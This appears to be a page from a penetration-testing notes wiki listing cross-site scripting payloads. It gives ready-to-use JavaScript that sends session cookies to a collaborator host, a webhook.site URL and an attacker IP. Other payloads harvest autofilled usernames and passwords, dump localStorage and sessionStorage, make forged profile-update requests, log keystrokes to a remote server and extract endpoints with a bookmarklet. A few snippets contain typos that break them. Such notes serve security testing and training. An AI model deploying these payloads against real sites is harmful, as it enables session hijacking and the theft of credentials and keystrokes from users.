Payloads

In modern HTML (HTML5), the / at the end of a self-closing tag is optional, but in XHTML is required.

Stealing Cookies

<img src="http://localhost?c='+document.cookie+'" />

fetch("http://localhost?c="+document.cookie);

// collaborator payload
<script>
    fetch('https://705jjd45qk9l1pb4rhns097xgomfa5yu.oastify.com', 
    {
        method: 'POST',
        mode: 'no-cors',
        body:document.cookie
    });
</script>

<script>var i = new Image; i.src="https://webhook.site/094ef770-e736-4b31-a3cb-34be690ff1b9/?"+document.cookie</script>

xss.js

// save the value of the cookie in a variable
let cookie = document.cookie
// URL-encode the variable
let encodedCookie = encodeURIComponent(cookie)
// make a GET request to our attacker machine exfiltrating the cookie
fetch("http://192.168.45.214/exfil?data=" + encodedCookie)

Autofilled Credentials

createForm.js

// create the input elements
let usernameField = document.createElement("input")
usernameField.type = "text"
usernameField.name = "username"
usernameField.id = "username"

let passwordField = document.createElement("input")
passwordField.type = "password"
passwordField.name = "password"
passwordField.id = "password"

// append the elements to the body of the page
document.body.appendChild(usernameField)
document.body.appendChild(passwordField)

// exfiltrate as needed (we need to wait for the fields to be filled before exfiltrating the information)
setTimeout(function() {
 console.log("Username:", document.getElementById("username").value)
 console.log("Password:", document.getElementById("password").value)
}, 1000);

savedCreds.js

// save the body of the document into a var
let body = document.getElementsByTagName("body")[0]

// create the username element
var u = document.createElement("input");
u.type = "text";
u.style.position = "fixed";
//u.style.opacity = "0";

// create the password element
var p = document.createElement("input");
p.type = "password";
u.style.position = "fixed";
//u.style.opacity = "0";

// append elements to the body
body.append(u)
body.append(p)

// set a GET request after a 5 second timeout
setTimeout(function(){
    fetch("http://192.168.45.214/k?u=" + u.value + "&p=" + p.value)
    }, 5000);

Local Secrets

let data = JSON.stringify(localStorage)
let encodedData - encodeURIComponent(data)
fetch("http://<attackerIP>/exfil?data=" + encodedData)

let data = JSON.stringify(sessionStorage)
let encodedData - encodeURIComponent(data)
fetch("http://<attackerIP>/exfil?data=" + encodedData)

Session Riding

let xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost/updateprofile',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('email=updated@email.com’);

Keylogging

document.onkeypress = function(e) {
 get = window.event ? event : e
 key = get.keyCode ? get.keyCode : get.charCode
 key = String.fromCharCode(key)
 console.log(key)
}

keylogger.js

function logKey(event){
    fetch("http://192.168.45.214/k?key=" + event.key)
}
// for each keypress, execute the callback function
document.addEventListener('keydown', logKey);

Remote Resources

fetch('http://localhost/endpoint’)

<img src='http://localhost/file' />
<img src='x' onerror='http://localhost/file' />
<img src="x" onerror="window.location.href='http://localhost/file'">

<script src='http://localhost/file'></script>

Sorcery?

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const%20results=new%20Set;for(var%20i=0;i<scripts.length;i++){var%20t=scripts[i].src;""!=t&&fetch(t).then(function(t){return%20t.text()}).then(function(t){var%20e=t.matchAll(regex);for(let%20r%20of%20e)results.add(r[0])}).catch(function(t){console.log("An%20error%20occurred:%20",t)})}var%20pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const%20match%20of%20matches)results.add(match[0]);function%20writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

PreviousExploitation NextCI

Last updated 10 months ago

Was this helpful?